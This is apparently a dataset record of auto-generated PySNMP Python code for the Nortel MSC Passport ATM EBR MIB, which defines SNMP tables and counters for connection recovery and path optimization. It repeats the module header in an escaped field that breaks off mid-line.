mscAtmIfPnniEbrStorageType.setStatus('mandatory')\nmscAtmIfPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,\n 96, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrIndex.setStatus('mandatory')\nmscAtmIfPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, \n 96, 7, 20))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrProvTable.setStatus('mandatory')\nmscAtmIfPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 96, 7, 20, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrProvEntry.setStatus('mandatory')\nmscAtmIfPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, \n 36, 2, 1, 114, 96, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=\n ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')\n ).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 96, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=\n ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')\n ).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrPathOptimization.setStatus('mandatory')\nmscAtmIfPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, \n 96, 7, 30))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrOperTable.setStatus('mandatory')\nmscAtmIfPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 96, 7, 30, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrOperEntry.setStatus('mandatory')\nmscAtmIfPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 96, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=\n ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4,\n 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=\n ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,\n 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 3), Gauge32().subtype(\n subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,\n 96, 7, 40))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrStatsTable.setStatus('mandatory')\nmscAtmIfPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 96, 7, 40, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrStatsEntry.setStatus('mandatory')\nmscAtmIfPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 96, 7, 40, 1, 1), Counter32()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 96, 7, 40, 1, 2), Counter32()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrTotalPathOptimizations.setStatus('mandatory')\natmEbrGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1))\natmEbrGroupCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1))\natmEbrGroupCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1, 3)\n )\natmEbrGroupCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, \n 1, 3, 2))\natmEbrCapabilities = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3))\natmEbrCapabilitiesCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159,\n 3, 1))\natmEbrCapabilitiesCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, \n 159, 3, 1, 3))\natmEbrCapabilitiesCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, \n 159, 3, 1, 3, 2))\nmibBuilder.exportSymbols('Nortel-MsCarrier-MscPassport-AtmEbrMIB',\n mscAtmIfVptPnniEbr=mscAtmIfVptPnniEbr, atmEbrGroupCA=atmEbrGroupCA,\n mscAtmIfUniEbrTotalConnectionRecoveries=\n mscAtmIfUniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrComponentName=\n mscAtmIfPnniEbrComponentName, mscAtmIfVptPnniEbrProvEntry=\n mscAtmIfVptPnniEbrProvEntry,\n mscAtmIfVptVccEbrInfoTotalPathOptimizations=\n mscAtmIfVptVccEbrInfoTotalPathOptimizations, mscAtmIfIispEbrOperTable=\n mscAtmIfIispEbrOperTable, mscAtmIfPnniEbrStatsTable=\n mscAtmIfPnniEbrStatsTable, atmEbrGroup=atmEbrGroup,\n mscAtmIfUniEbrConnectionRecovery=mscAtmIfUniEbrConnectionRecovery,\n mscAtmIfVptIispEbrOperEntry=mscAtmIfVptIispEbrOperEntry,\n mscAtmIfVptUniEbrTotalPathOptimizations=\n mscAtmIfVptUniEbrTotalPathOptimizations, mscAtmIfVptVccSrcEbrOvIndex=\n mscAtmIfVptVccSrcEbrOvIndex, mscAtmIfUniEbr=mscAtmIfUniEbr,\n mscAtmIfVptUniEbrPathOptimization=mscAtmIfVptUniEbrPathOptimization,\n mscAtmIfUniEbrStatsEntry=mscAtmIfUniEbrStatsEntry,\n mscAtmIfVpcEbrInfoStorageType=mscAtmIfVpcEbrInfoStorageType,\n mscAtmIfVptIispEbrRowStatus=mscAtmIfVptIispEbrRowStatus,\n mscAtmIfPnniEbrProvTable=mscAtmIfPnniEbrProvTable,\n mscAtmIfVptPnniEbrSubscribedConnections=\n mscAtmIfVptPnniEbrSubscribedConnections,\n mscAtmIfVccEbrInfoTotalPathOptimizations=\n mscAtmIfVccEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbrStatsTable=\n mscAtmIfVptIispEbrStatsTable, mscAtmIfVptUniEbrProvEntry=\n mscAtmIfVptUniEbrProvEntry,\n mscAtmIfVptPnniEbrEligibleRecoveredConnections=\n mscAtmIfVptPnniEbrEligibleRecoveredConnections,\n mscAtmIfVccEbrInfoComponentName=mscAtmIfVccEbrInfoComponentName,\n mscAtmIfVccSrcEbrOvRowStatusEntry=mscAtmIfVccSrcEbrOvRowStatusEntry,\n mscAtmIfPnniEbrIndex=mscAtmIfPnniEbrIndex,\n mscAtmIfVpcSrcEbrOvStorageType=mscAtmIfVpcSrcEbrOvStorageType,\n mscAtmIfIispEbrRowStatusTable=mscAtmIfIispEbrRowStatusTable,\n mscAtmIfVptPnniEbrPathOptimization=mscAtmIfVptPnniEbrPathOptimization,\n mscAtmIfIispEbrProvEntry=mscAtmIfIispEbrProvEntry,\n mscAtmIfVccEbrInfoRowStatusEntry=mscAtmIfVccEbrInfoRowStatusEntry,\n mscAtmIfVptIispEbrStorageType=mscAtmIfVptIispEbrStorageType,\n mscAtmIfVptPnniEbrStatsEntry=mscAtmIfVptPnniEbrStatsEntry,\n mscAtmIfVptVccEbrInfoIndex=mscAtmIfVptVccEbrInfoIndex,\n mscAtmIfPnniEbrTotalConnectionRecoveries=\n mscAtmIfPnniEbrTotalConnectionRecoveries,\n mscAtmIfVptVccEbrInfoOperTable=mscAtmIfVptVccEbrInfoOperTable,\n mscAtmIfPnniEbrEligibleRecoveredConnections=\n mscAtmIfPnniEbrEligibleRecoveredConnections,\n mscAtmIfVpcEbrInfoRecoverySubscribed=\n mscAtmIfVpcEbrInfoRecoverySubscribed, mscAtmIfVptVccSrcEbrOvProvTable=\n mscAtmIfVptVccSrcEbrOvProvTable,\n mscAtmIfVptVccEbrInfoConnectionRecovered=\n mscAtmIfVptVccEbrInfoConnectionRecovered,\n mscAtmIfVptIispEbrComponentName=mscAtmIfVptIispEbrComponentName,\n mscAtmIfVptUniEbrComponentName=mscAtmIfVptUniEbrComponentName,\n mscAtmIfVptVccEbrInfoRowStatusEntry=mscAtmIfVptVccEbrInfoRowStatusEntry,\n mscAtmIfIispEbrComponentName=mscAtmIfIispEbrComponentName,\n mscAtmIfPnniEbrOperEntry=mscAtmIfPnniEbrOperEntry,\n mscAtmIfVptIispEbrTotalPathOptimizations=\n mscAtmIfVptIispEbrTotalPathOptimizations, mscAtmIfVccEbrInfo=\n mscAtmIfVccEbrInfo, mscAtmIfVptUniEbrIndex=mscAtmIfVptUniEbrIndex,\n mscAtmIfVptUniEbrIneligibleRecoveredConnections=\n mscAtmIfVptUniEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02\n =atmEbrCapabilitiesCA02, mscAtmIfVptUniEbrRowStatusTable=\n mscAtmIfVptUniEbrRowStatusTable, mscAtmIfVptVccEbrInfoRowStatusTable=\n mscAtmIfVptVccEbrInfoRowStatusTable, mscAtmIfVptIispEbrProvTable=\n mscAtmIfVptIispEbrProvTable, mscAtmIfVpcSrcEbrOvOptimizationSubscribed=\n mscAtmIfVpcSrcEbrOvOptimizationSubscribed,\n mscAtmIfIispEbrTotalPathOptimizations=\n mscAtmIfIispEbrTotalPathOptimizations, mscAtmIfVccSrcEbrOvComponentName\n =mscAtmIfVccSrcEbrOvComponentName,\n mscAtmIfVccSrcEbrOvOptimizationSubscribed=\n mscAtmIfVccSrcEbrOvOptimizationSubscribed, mscAtmIfUniEbrOperTable=\n mscAtmIfUniEbrOperTable, mscAtmIfIispEbrStorageType=\n mscAtmIfIispEbrStorageType, mscAtmIfVptVccSrcEbrOv=\n mscAtmIfVptVccSrcEbrOv, mscAtmIfIispEbrStatsTable=\n mscAtmIfIispEbrStatsTable, mscAtmIfUniEbrSubscribedConnections=\n mscAtmIfUniEbrSubscribedConnections, mscAtmIfUniEbrRowStatusTable=\n mscAtmIfUniEbrRowStatusTable, mscAtmIfIispEbrStatsEntry=\n mscAtmIfIispEbrStatsEntry, mscAtmIfVptVccEbrInfoOperEntry=\n mscAtmIfVptVccEbrInfoOperEntry, mscAtmIfIispEbrRowStatusEntry=\n mscAtmIfIispEbrRowStatusEntry,\n mscAtmIfVptIispEbrIneligibleRecoveredConnections=\n mscAtmIfVptIispEbrIneligibleRecoveredConnections,\n atmEbrCapabilitiesCA02A=atmEbrCapabilitiesCA02A,\n mscAtmIfVptVccEbrInfoOptimizationSubscribed=\n mscAtmIfVptVccEbrInfoOptimizationSubscribed, mscAtmIfVccEbrInfoIndex=\n mscAtmIfVccEbrInfoIndex, mscAtmIfIispEbrPathOptimization=\n mscAtmIfIispEbrPathOptimization, mscAtmIfPnniEbrRowStatusEntry=\n mscAtmIfPnniEbrRowStatusEntry, mscAtmIfVptIispEbrSubscribedConnections=\n mscAtmIfVptIispEbrSubscribedConnections, mscAtmIfUniEbrStatsTable=\n mscAtmIfUniEbrStatsTable, mscAtmIfVptUniEbrStatsTable=\n mscAtmIfVptUniEbrStatsTable, mscAtmIfVptPnniEbrRowStatus=\n mscAtmIfVptPnniEbrRowStatus, mscAtmIfVptUniEbrProvTable=\n mscAtmIfVptUniEbrProvTable, mscAtmIfVptUniEbrOperEntry=\n mscAtmIfVptUniEbrOperEntry, mscAtmIfVccEbrInfoRecoverySubscribed=\n mscAtmIfVccEbrInfoRecoverySubscribed, mscAtmIfVpcEbrInfo=\n mscAtmIfVpcEbrInfo, mscAtmIfPnniEbrIneligibleRecoveredConnections=\n mscAtmIfPnniEbrIneligibleRecoveredConnections,\n mscAtmIfVpcSrcEbrOvRowStatusTable=mscAtmIfVpcSrcEbrOvRowStatusTable,\n mscAtmIfVptPnniEbrIneligibleRecoveredConnections=\n mscAtmIfVptPnniEbrIneligibleRecoveredConnections,\n mscAtmIfVpcEbrInfoConnectionRecovered=\n mscAtmIfVpcEbrInfoConnectionRecovered, mscAtmIfVccSrcEbrOvProvTable=\n mscAtmIfVccSrcEbrOvProvTable, mscAtmIfVccEbrInfoRowStatusTable=\n mscAtmIfVccEbrInfoRowStatusTable, mscAtmIfVccEbrInfoStorageType=\n mscAtmIfVccEbrInfoStorageType, mscAtmIfVpcEbrInfoTotalPathOptimizations\n =mscAtmIfVpcEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbr=\n mscAtmIfVptIispEbr, mscAtmIfVpcEbrInfoRowStatus=\n mscAtmIfVpcEbrInfoRowStatus, mscAtmIfVccSrcEbrOvRowStatusTable=\n mscAtmIfVccSrcEbrOvRowStatusTable, mscAtmIfIispEbrConnectionRecovery=\n mscAtmIfIispEbrConnectionRecovery, mscAtmIfVccSrcEbrOvProvEntry=\n mscAtmIfVccSrcEbrOvProvEntry, mscAtmIfUniEbrIndex=mscAtmIfUniEbrIndex,\n mscAtmIfVptUniEbrTotalConnectionRecoveries=\n mscAtmIfVptUniEbrTotalConnectionRecoveries,\n mscAtmIfVpcEbrInfoTotalConnectionRecoveries=\n mscAtmIfVpcEbrInfoTotalConnectionRecoveries,\n mscAtmIfVptVccSrcEbrOvRowStatusEntry=\n mscAtmIfVptVccSrcEbrOvRowStatusEntry,\n mscAtmIfIispEbrTotalConnectionRecoveries=\n mscAtmIfIispEbrTotalConnectionRecoveries, mscAtmIfIispEbrRowStatus=\n mscAtmIfIispEbrRowStatus, mscAtmIfVpcSrcEbrOvProvTable=\n mscAtmIfVpcSrcEbrOvProvTable, mscAtmIfVptUniEbrRowStatus=\n mscAtmIfVptUniEbrRowStatus, mscAtmIfPnniEbrRowStatusTable=\n mscAtmIfPnniEbrRowStatusTable, mscAtmIfPnniEbrStatsEntry=\n mscAtmIfPnniEbrStatsEntry, mscAtmIfVpcSrcEbrOvIndex=\n mscAtmIfVpcSrcEbrOvIndex, mscAtmIfVpcEbrInfoComponentName=\n mscAtmIfVpcEbrInfoComponentName, mscAtmIfVptIispEbrPathOptimization=\n mscAtmIfVptIispEbrPathOptimization, mscAtmIfVpcSrcEbrOvRowStatus=\n mscAtmIfVpcSrcEbrOvRowStatus, mscAtmIfVpcEbrInfoRowStatusEntry=\n mscAtmIfVpcEbrInfoRowStatusEntry, mscAtmIfVptPnniEbrOperEntry=\n mscAtmIfVptPnniEbrOperEntry, mscAtmIfIispEbrSubscribedConnections=\n mscAtmIfIispEbrSubscribedConnections, mscAtmIfVccSrcEbrOv=\n mscAtmIfVccSrcEbrOv, mscAtmIfVptIispEbrEligibleRecoveredConnections=\n mscAtmIfVptIispEbrEligibleRecoveredConnections, mscAtmIfUniEbrProvEntry\n =mscAtmIfUniEbrProvEntry, mscAtmIfVpcEbrInfoRowStatusTable=\n mscAtmIfVpcEbrInfoRowStatusTable, mscAtmIfVptPnniEbrComponentName=\n mscAtmIfVptPnniEbrComponentName, mscAtmIfVptPnniEbrConnectionRecovery=\n mscAtmIfVptPnniEbrConnectionRecovery, mscAtmIfVptVccSrcEbrOvRowStatus=\n mscAtmIfVptVccSrcEbrOvRowStatus, mscAtmIfVptIispEbrRowStatusTable=\n mscAtmIfVptIispEbrRowStatusTable, mscAtmIfVptPnniEbrStorageType=\n mscAtmIfVptPnniEbrStorageType, mscAtmIfVptVccEbrInfoStorageType=\n mscAtmIfVptVccEbrInfoStorageType, mscAtmIfIispEbr=mscAtmIfIispEbr,\n mscAtmIfVccEbrInfoOperEntry=mscAtmIfVccEbrInfoOperEntry,\n mscAtmIfVptPnniEbrTotalConnectionRecoveries=\n mscAtmIfVptPnniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrRowStatus=\n mscAtmIfPnniEbrRowStatus, mscAtmIfVpcSrcEbrOvProvEntry=\n mscAtmIfVpcSrcEbrOvProvEntry, mscAtmIfVccEbrInfoRowStatus=\n mscAtmIfVccEbrInfoRowStatus, mscAtmIfVptIispEbrIndex=\n mscAtmIfVptIispEbrIndex, mscAtmIfVpcEbrInfoOperEntry=\n mscAtmIfVpcEbrInfoOperEntry, mscAtmIfVptIispEbrOperTable=\n mscAtmIfVptIispEbrOperTable, mscAtmIfUniEbrProvTable=\n mscAtmIfUniEbrProvTable, mscAtmIfPnniEbrPathOptimization=\n mscAtmIfPnniEbrPathOptimization, mscAtmIfVpcEbrInfoStatsTable=\n mscAtmIfVpcEbrInfoStatsTable, mscAtmIfVccSrcEbrOvIndex=\n mscAtmIfVccSrcEbrOvIndex, mscAtmIfPnniEbrSubscribedConnections=\n mscAtmIfPnniEbrSubscribedConnections, mscAtmIfVptIispEbrRowStatusEntry=\n mscAtmIfVptIispEbrRowStatusEntry, mscAtmIfIispEbrProvTable=\n mscAtmIfIispEbrProvTable, mscAtmIfVptVccSrcEbrOvComponentName=\n mscAtmIfVptVccSrcEbrOvComponentName,\n mscAtmIfVptUniEbrConnectionRecovery=mscAtmIfVptUniEbrConnectionRecovery,\n mscAtmIfVccSrcEbrOvStorageType=mscAtmIfVccSrcEbrOvStorageType,\n mscAtmIfVpcSrcEbrOv=mscAtmIfVpcSrcEbrOv,\n mscAtmIfVptPnniEbrRowStatusTable=mscAtmIfVptPnniEbrRowStatusTable,\n mscAtmIfUniEbrEligibleRecoveredConnections=\n mscAtmIfUniEbrEligibleRecoveredConnections,\n mscAtmIfVptUniEbrRowStatusEntry=mscAtmIfVptUniEbrRowStatusEntry,\n mscAtmIfVccSrcEbrOvRowStatus=mscAtmIfVccSrcEbrOvRowStatus,\n mscAtmIfIispEbrEligibleRecoveredConnections=\n mscAtmIfIispEbrEligibleRecoveredConnections, mscAtmIfPnniEbrOperTable=\n mscAtmIfPnniEbrOperTable, mscAtmIfVpcEbrInfoOperTable=\n mscAtmIfVpcEbrInfoOperTable, mscAtmIfVpcEbrInfoStatsEntry=\n mscAtmIfVpcEbrInfoStatsEntry, mscAtmIfVptUniEbrStorageType=\n mscAtmIfVptUniEbrStorageType, mscAtmIfVccEbrInfoStatsTable=\n mscAtmIfVccEbrInfoStatsTable, mscAtmIfVptVccEbrInfoStatsTable=\n mscAtmIfVptVccEbrInfoStatsTable, mscAtmIfUniEbrPathOptimization=\n mscAtmIfUniEbrPathOptimization, mscAtmIfVptPnniEbrStatsTable=\n mscAtmIfVptPnniEbrStatsTable, mscAtmIfVptUniEbrSubscribedConnections=\n mscAtmIfVptUniEbrSubscribedConnections, mscAtmIfVptVccEbrInfo=\n mscAtmIfVptVccEbrInfo, mscAtmIfPnniEbrConnectionRecovery=\n mscAtmIfPnniEbrConnectionRecovery,\n mscAtmIfVccEbrInfoConnectionRecovered=\n mscAtmIfVccEbrInfoConnectionRecovered, mscAtmIfVccEbrInfoStatsEntry=\n mscAtmIfVccEbrInfoStatsEntry,\n mscAtmIfVptVccEbrInfoTotalConnectionRecoveries=\n mscAtmIfVptVccEbrInfoTotalConnectionRecoveries,\n mscAtmIfUniEbrStorageType=mscAtmIfUniEbrStorageType,\n mscAtmIfVptUniEbrStatsEntry=mscAtmIfVptUniEbrStatsEntry,\n mscAtmIfVptPnniEbrProvTable=mscAtmIfVptPnniEbrProvTable,\n mscAtmIfVccSrcEbrOvRecoverySubscribed=\n mscAtmIfVccSrcEbrOvRecoverySubscribed, atmEbrCapabilities=\n atmEbrCapabilities, mscAtmIfUniEbrComponentName=\n mscAtmIfUniEbrComponentName, mscAtmIfPnniEbrTotalPathOptimizations=\n mscAtmIfPnniEbrTotalPathOptimizations,\n mscAtmIfUniEbrIneligibleRecoveredConnections=\n mscAtmIfUniEbrIneligibleRecoveredConnections, mscAtmIfPnniEbr=\n mscAtmIfPnniEbr, mscAtmIfVptIispEbrProvEntry=\n mscAtmIfVptIispEbrProvEntry, mscAtmIfUniEbrRowStatusEntry=\n mscAtmIfUniEbrRowStatusEntry, mscAtmIfVptPnniEbrRowStatusEntry=\n mscAtmIfVptPnniEbrRowStatusEntry, mscAtmIfVpcEbrInfoIndex=\n mscAtmIfVpcEbrInfoIndex, mscAtmIfVptVccSrcEbrOvProvEntry=\n mscAtmIfVptVccSrcEbrOvProvEntry, mscAtmIfVccEbrInfoOperTable=\n mscAtmIfVccEbrInfoOperTable, mscAtmIfVptVccEbrInfoStatsEntry=\n mscAtmIfVptVccEbrInfoStatsEntry, atmEbrGroupCA02A=atmEbrGroupCA02A,\n mscAtmIfVccEbrInfoOptimizationSubscribed=\n mscAtmIfVccEbrInfoOptimizationSubscribed,\n mscAtmIfVptVccSrcEbrOvRowStatusTable=\n mscAtmIfVptVccSrcEbrOvRowStatusTable, atmEbrMIB=atmEbrMIB,\n mscAtmIfVptVccEbrInfoRecoverySubscribed=\n mscAtmIfVptVccEbrInfoRecoverySubscribed,\n mscAtmIfVpcSrcEbrOvRowStatusEntry=mscAtmIfVpcSrcEbrOvRowStatusEntry,\n mscAtmIfVptVccEbrInfoRowStatus=mscAtmIfVptVccEbrInfoRowStatus,\n mscAtmIfVptIispEbrStatsEntry=mscAtmIfVptIispEbrStatsEntry,\n mscAtmIfPnniEbrStorageType=mscAtmIfPnniEbrStorageType,\n mscAtmIfPnniEbrProvEntry=mscAtmIfPnniEbrProvEntry,\n mscAtmIfVptUniEbrOperTable=mscAtmIfVptUniEbrOperTable,\n mscAtmIfIispEbrIneligibleRecoveredConnections=\n mscAtmIfIispEbrIneligibleRecoveredConnections,\n mscAtmIfVptIispEbrConnectionRecovery=\n mscAtmIfVptIispEbrConnectionRecovery, mscAtmIfVptUniEbr=\n mscAtmIfVptUniEbr, atmEbrGroupCA02=atmEbrGroupCA02,\n mscAtmIfVptIispEbrTotalConnectionRecoveries=\n mscAtmIfVptIispEbrTotalConnectionRecoveries,\n mscAtmIfUniEbrTotalPathOptimizations=\n mscAtmIfUniEbrTotalPathOptimizations,\n mscAtmIfVpcSrcEbrOvRecoverySubscribed=\n mscAtmIfVpcSrcEbrOvRecoverySubscribed, mscAtmIfVptPnniEbrOperTable=\n mscAtmIfVptPnniEbrOperTable,\n mscAtmIfVptVccSrcEbrOvOptimizationSubscribed=\n mscAtmIfVptVccSrcEbrOvOptimizationSubscribed,\n mscAtmIfVptUniEbrEligibleRecoveredConnections=\n mscAtmIfVptUniEbrEligibleRecoveredConnections,\n mscAtmIfVpcEbrInfoOptimizationSubscribed=\n mscAtmIfVpcEbrInfoOptimizationSubscribed, mscAtmIfVptPnniEbrIndex=\n mscAtmIfVptPnniEbrIndex, mscAtmIfUniEbrRowStatus=\n mscAtmIfUniEbrRowStatus, mscAtmIfUniEbrOperEntry=\n mscAtmIfUniEbrOperEntry, mscAtmIfVptVccSrcEbrOvStorageType=\n mscAtmIfVptVccSrcEbrOvStorageType,\n mscAtmIfVptPnniEbrTotalPathOptimizations=\n mscAtmIfVptPnniEbrTotalPathOptimizations,\n mscAtmIfVpcSrcEbrOvComponentName=mscAtmIfVpcSrcEbrOvComponentName,\n mscAtmIfVptVccEbrInfoComponentName=mscAtmIfVptVccEbrInfoComponentName,\n mscAtmIfIispEbrOperEntry=mscAtmIfIispEbrOperEntry,\n mscAtmIfVptVccSrcEbrOvRecoverySubscribed=\n mscAtmIfVptVccSrcEbrOvRecoverySubscribed, mscAtmIfIispEbrIndex=\n mscAtmIfIispEbrIndex, atmEbrCapabilitiesCA=atmEbrCapabilitiesCA,\n mscAtmIfVccEbrInfoTotalConnectionRecoveries=\n mscAtmIfVccEbrInfoTotalConnectionRecoveries)\n",
"step-4": "#\n# PySNMP MIB module Nortel-MsCarrier-MscPassport-AtmEbrMIB (http://snmplabs.com/pysmi)\n# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Nortel-MsCarrier-MscPassport-AtmEbrMIB\n# Produced by pysmi-0.3.4 at Mon Apr 29 20:19:41 2019\n# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4\n# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) \n#\nInteger, ObjectIdentifier, OctetString = mibBuilder.importSymbols(\"ASN1\", \"Integer\", \"ObjectIdentifier\", \"OctetString\")\nNamedValues, = mibBuilder.importSymbols(\"ASN1-ENUMERATION\", \"NamedValues\")\nValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols(\"ASN1-REFINEMENT\", \"ValueRangeConstraint\", \"SingleValueConstraint\", \"ValueSizeConstraint\", \"ConstraintsUnion\", \"ConstraintsIntersection\")\nmscAtmIfIndex, mscAtmIfVptIndex, mscAtmIfVcc, mscAtmIfVptVccIndex, mscAtmIfVpc, mscAtmIfVptVcc, mscAtmIfVccIndex, mscAtmIfVpcIndex = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\", \"mscAtmIfVptIndex\", \"mscAtmIfVcc\", \"mscAtmIfVptVccIndex\", \"mscAtmIfVpc\", \"mscAtmIfVptVcc\", \"mscAtmIfVccIndex\", \"mscAtmIfVpcIndex\")\nmscAtmIfIisp, mscAtmIfVptIisp, mscAtmIfVptIispIndex, mscAtmIfIispIndex = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfIisp\", \"mscAtmIfVptIisp\", \"mscAtmIfVptIispIndex\", \"mscAtmIfIispIndex\")\nmscAtmIfVpcSrc, mscAtmIfVptVccSrcIndex, mscAtmIfVccSrcIndex, mscAtmIfVptVccSrc, mscAtmIfVpcSrcIndex, mscAtmIfVccSrc = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-AtmNetworkingMIB\", \"mscAtmIfVpcSrc\", \"mscAtmIfVptVccSrcIndex\", \"mscAtmIfVccSrcIndex\", \"mscAtmIfVptVccSrc\", \"mscAtmIfVpcSrcIndex\", \"mscAtmIfVccSrc\")\nmscAtmIfVptPnniIndex, mscAtmIfPnniIndex, mscAtmIfPnni, mscAtmIfVptPnni = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfVptPnniIndex\", \"mscAtmIfPnniIndex\", \"mscAtmIfPnni\", \"mscAtmIfVptPnni\")\nmscAtmIfVptUni, mscAtmIfUni, mscAtmIfUniIndex, mscAtmIfVptUniIndex = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfVptUni\", \"mscAtmIfUni\", \"mscAtmIfUniIndex\", \"mscAtmIfVptUniIndex\")\nCounter32, DisplayString, Gauge32, StorageType, RowStatus = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-StandardTextualConventionsMIB\", \"Counter32\", \"DisplayString\", \"Gauge32\", \"StorageType\", \"RowStatus\")\nNonReplicated, = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-TextualConventionsMIB\", \"NonReplicated\")\nmscPassportMIBs, = mibBuilder.importSymbols(\"Nortel-MsCarrier-MscPassport-UsefulDefinitionsMIB\", \"mscPassportMIBs\")\nNotificationGroup, ModuleCompliance = mibBuilder.importSymbols(\"SNMPv2-CONF\", \"NotificationGroup\", \"ModuleCompliance\")\nInteger32, ObjectIdentity, ModuleIdentity, Bits, Counter32, IpAddress, Gauge32, NotificationType, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, Unsigned32, Counter64, TimeTicks = mibBuilder.importSymbols(\"SNMPv2-SMI\", \"Integer32\", \"ObjectIdentity\", \"ModuleIdentity\", \"Bits\", \"Counter32\", \"IpAddress\", \"Gauge32\", \"NotificationType\", \"iso\", \"MibScalar\", \"MibTable\", \"MibTableRow\", \"MibTableColumn\", \"MibIdentifier\", \"Unsigned32\", \"Counter64\", \"TimeTicks\")\nTextualConvention, DisplayString = mibBuilder.importSymbols(\"SNMPv2-TC\", \"TextualConvention\", \"DisplayString\")\natmEbrMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159))\nmscAtmIfVpcSrcEbrOv = 